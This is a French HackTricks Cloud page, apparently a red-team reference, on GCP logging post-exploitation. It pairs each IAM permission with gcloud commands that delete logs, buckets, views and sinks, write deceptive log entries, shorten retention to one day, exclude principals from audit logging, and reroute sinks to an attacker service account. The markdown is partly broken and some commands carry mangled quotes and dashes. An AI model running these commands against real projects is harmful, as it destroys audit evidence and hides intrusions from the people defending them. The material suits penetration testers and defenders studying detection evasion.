GCP - Post-exploitation des logs

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Informations de base

Pour plus d’informations, voir :

GCP - Logging Enum

Pour d’autres façons de perturber la surveillance, voir :

GCP - Monitoring Post Exploitation

Journalisation par défaut

Par défaut vous ne serez pas repéré simplement pour avoir effectué des actions en lecture. Pour plus d’informations, voir la section Logging Enum.

Ajouter un principal exclu

Dans [https://console.cloud.google.com/iam-admin/audit/allservices] et [https://console.cloud.google.com/iam-admin/audit] il est possible d’ajouter des principals pour ne pas générer de logs. Un attaquant pourrait abuser de cela pour éviter d’être détecté.

Lire les logs - logging.logEntries.list

Lire les entrées de logs ```bash # Read logs gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

Everything from a timestamp

gcloud logging read “timestamp >= "2023-01-01T00:00:00Z"” –limit=10 –format=json

Use these options to indicate a different bucket or view to use: –bucket=_Required –view=_Default

</details>

### `logging.logs.delete`

<details>

<summary>Supprimer des entrées de logs</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>

Écrire des logs - logging.logEntries.create

Écrire une entrée de log ```bash # Write a log entry to try to disrupt some system gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR ```

logging.buckets.update

Mettre à jour la rétention du bucket de logs ```bash # Set retention period to 1 day (_Required has a fixed one of 400days)

gcloud logging buckets update bucketlog –location= –description=“New description” –retention-days=1

</details>

### `logging.buckets.delete`

<details>

<summary>Supprimer un bucket de logs</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>

logging.links.delete

Supprimer le log link ```bash # Delete link gcloud logging links delete --bucket --location ```

logging.views.delete

Supprimer la vue de logging ```bash # Delete a logging view to remove access to anyone using it gcloud logging views delete --bucket= --location=global ```

logging.views.update

Mettre à jour la logging view pour masquer les données ```bash # Update a logging view to hide data gcloud logging views update --log-filter="resource.type=gce_instance" --bucket= --location=global --description="New description for the log view" ```

logging.logMetrics.update

Mettre à jour les métriques basées sur les logs ```bash # Update log based metrics - logging.logMetrics.update gcloud logging metrics update --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID ```

logging.logMetrics.delete

Supprimer les métriques basées sur les logs ```bash # Delete log based metrics - logging.logMetrics.delete gcloud logging metrics delete ```

logging.sinks.delete

Supprimer log sink ```bash # Delete sink - logging.sinks.delete gcloud logging sinks delete ```

logging.sinks.update

Mettre à jour/perturber le log sink ```bash # Disable sink - logging.sinks.update gcloud logging sinks update --disabled

Createa filter to exclude attackers logs - logging.sinks.update

gcloud logging sinks update SINK_NAME –add-exclusion=“name=exclude-info-logs,filter=severity<INFO”

Change where the sink is storing the data - logging.sinks.update

gcloud logging sinks update new-destination

Change the service account to one withuot permissions to write in the destination - logging.sinks.update

gcloud logging sinks update SINK_NAME –custom-writer-identity=attacker-service-account-email –project=PROJECT_ID

Remove explusions to try to overload with logs - logging.sinks.update

gcloud logging sinks update SINK_NAME –clear-exclusions

If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update

gcloud logging sinks update SINK_NAME –use-partitioned-tables gcloud logging sinks update SINK_NAME –no-use-partitioned-tables

</details>

> [!TIP]
> Apprenez et pratiquez le hacking AWS :<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Apprenez et pratiquez le hacking GCP : <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Apprenez et pratiquez le hacking Azure : <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Soutenir HackTricks</summary>
>
> - Vérifiez les [**plans d'abonnement**](https://github.com/sponsors/carlospolop) !
> - **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez-nous sur** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Partagez des astuces de hacking en soumettant des PR au** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts github.
>
> </details>